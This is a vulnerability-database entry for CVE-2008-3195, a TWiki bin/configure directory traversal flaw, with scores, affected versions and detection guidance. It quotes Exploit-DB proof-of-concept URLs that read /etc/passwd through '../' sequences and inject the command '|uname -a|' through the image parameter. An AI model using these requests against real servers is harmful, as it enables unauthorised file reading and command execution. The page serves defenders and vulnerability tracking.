CVE-2008-3195
published 2008-09-18CVE-2008-3195: Directory traversal vulnerability in bin/configure in TWiki before 4.2.3, when a certain step in the installation guide is skipped, allows remote attackers to…
PriorityP345medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
8.28%
94.2th percentile
Directory traversal vulnerability in bin/configure in TWiki before 4.2.3, when a certain step in the installation guide is skipped, allows remote attackers to read arbitrary files via a query string containing a .. (dot dot) in the image variable, and execute arbitrary files via unspecified vectors.
Affected
13 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| twiki | twiki | <= 4.2.2 | — |
| twiki | twiki | — | — |
| twiki | twiki | — | — |
| twiki | twiki | — | — |
| twiki | twiki | — | — |
| twiki | twiki | — | — |
| twiki | twiki | — | — |
| twiki | twiki | — | — |
| twiki | twiki | — | — |
| twiki | twiki | — | — |
| twiki | twiki | — | — |
| twiki | twiki | — | — |
| twiki | twiki | — | — |
Detection & IOCsextracted from sources · hover to see the quote
urlhttp://www.examplo.org/{PATH}/bin/configure?action=image;image=../../../../../../etc/passwd;type=text/plain↗
urlhttp://localhost/twiki/bin/configure?action=image;image=../../../../../../../etc/passwd;type=text/plain↗
- →Look for HTTP requests to /bin/configure with 'action=image' and 'image=' parameters containing directory traversal sequences (../) in the query string. ↗
- →Detect pipe characters (|) in the 'image' parameter of requests to /bin/configure, indicating attempted command execution via the open() shell injection vector. ↗
- →Alert on requests to /bin/configure where the 'type' parameter is set to 'text/plain' alongside an 'image' parameter, as this is the attacker-controlled content-type used to read arbitrary files. ↗
- →The vulnerability is only exploitable if the /bin/configure script is publicly accessible; monitor for unauthenticated external access to this endpoint. ↗
- ·The vulnerability is only exploitable when a specific step in the TWiki installation guide is skipped (step 8 of Basic Installation), which leaves /bin/configure publicly accessible. Instances that have followed the full installation guide and restricted access to configure are not exploitable. ↗
- ·Affected versions are TWiki 4.2.0 through 4.2.2; TWiki 4.2.3 and later contain the fix. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
TWiki 4.2.2 - 'action' Remote Code Execution
exploitdb·2008-09-21·CVSS 6.8
CVE-2008-4112 [MEDIUM] TWiki 4.2.2 - 'action' Remote Code Execution
TWiki 4.2.2 - 'action' Remote Code Execution
---
#-----------webDEViL - [ w3bd3vil [at] gmail [dot] com ] -----------#
#-----------TWiki Remote Code Execution header(-type => $query->param('type'));
# So use this instead:
print 'Content-type: '.$query->param('type')."\n\n";
if( open(F, 'logos/'.$query->param('image' ))) {
local $/ = undef;
print ;
close(F);
}
http://localhost/twiki/bin/configure?action=image;image=../../../../../../../etc/passwd;type=text/plain
http://localhost/twiki/bin/configure?action=image;image=|uname -a|;type=text/plain
# milw0rm.com [2008-09-21]
Exploit-DB
TWiki 4.2.0 - 'configure' Remote File Disclosure
exploitdb·2008-08-19
CVE-2008-4112 TWiki 4.2.0 - 'configure' Remote File Disclosure
TWiki 4.2.0 - 'configure' Remote File Disclosure
---
################################################################################################################
# #
# TWiki 4.2.0 File Disclosure Vuln (configure) #
# #
################################################################################################################
"We're brazilian newbies!!! :p" - Th1nk3r
Info
Classe : Input Validation Error
Remote : Yes
Local : No
Date : 05/08/2008
Credits : Th1nk3r (cnwfhguohrugbo / gmail.com)
Greetz : w4n73d h4ck3r, Vitor, Vonnatur, FuradordeSyS, B470-Killer, M4v3rick.
Description
TWiki version 4.2.0 (I haven't tested other versions) is vulnerable to a File Disclosure. It's only possible
to exploit the bug if you can access the "/bin/configure" script.
Otherwise, you can not exp
No writeups or analysis indexed.
http://secunia.com/advisories/31849http://secunia.com/advisories/31964http://securityreason.com/securityalert/4265http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2008-3195http://twiki.org/cgi-bin/view/Codev/TWikiRelease04x02x03#4_2_3_Bugfix_Highlightshttp://www.kb.cert.org/vuls/id/362012http://www.kb.cert.org/vuls/id/RGII-7JEQ7Lhttp://www.vupen.com/english/advisories/2008/2586https://exchange.xforce.ibmcloud.com/vulnerabilities/45182https://exchange.xforce.ibmcloud.com/vulnerabilities/45183https://www.exploit-db.com/exploits/6269http://secunia.com/advisories/31849http://secunia.com/advisories/31964http://securityreason.com/securityalert/4265http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2008-3195http://twiki.org/cgi-bin/view/Codev/TWikiRelease04x02x03#4_2_3_Bugfix_Highlightshttp://www.kb.cert.org/vuls/id/362012http://www.kb.cert.org/vuls/id/RGII-7JEQ7Lhttp://www.vupen.com/english/advisories/2008/2586https://exchange.xforce.ibmcloud.com/vulnerabilities/45182https://exchange.xforce.ibmcloud.com/vulnerabilities/45183https://www.exploit-db.com/exploits/6269
2008-09-18
Published